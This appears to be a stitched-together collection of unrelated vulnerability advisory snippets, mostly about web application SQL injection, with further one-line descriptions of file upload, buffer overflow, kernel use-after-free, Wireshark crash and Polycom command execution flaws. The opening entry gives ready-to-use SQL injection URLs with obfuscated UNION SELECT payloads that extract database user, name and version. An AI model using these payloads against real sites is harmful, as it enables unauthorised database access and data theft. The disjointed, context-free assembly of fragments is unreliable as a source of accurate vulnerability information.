The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/browse-category.php?cat=[SQL] -91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- 2) http://localhost/[PATH]/browse-scategory.php?sc=[SQL] -34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
The vulnerability allows an attacker to inject sql commands by sending a malicious payload to the 'pid' parameter of the 'single-cause.php' script.
The vulnerability allows an attacker to inject sql commands by sending a maliciously crafted HTTP request to the vulnerable application. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database.
The vulnerability allows an attacker upload arbitrary file. Users profile picture arbitrary file can be uploaded.
Upon connection the victim is sent a specially crafted buffer overwriting the SEH record, resulting in code execution.
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'id' of the domain.php script. An example of the exploit is provided in the proof of concept section.
When a socket sock object is in DCCP_LISTEN state and connect() system call is being called with AF_UNSPEC, the dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free dccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them, then when we call connect() again with AF_INET6 sockaddr family, the sock object gets cloned via dccp_create_openreq_child() and returns a new sock object, which holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old sock object, and this leads to both the old and new sock objects can use the same memory.
The CIP Safety dissector could crash, making Wireshark vulnerable to a Denial of Service attack. It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.
Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl.
SQL Injection on GET parameter = token. The payloads used are boolean-based blind, AND/OR time-based blind and UNION query.
Services By CQR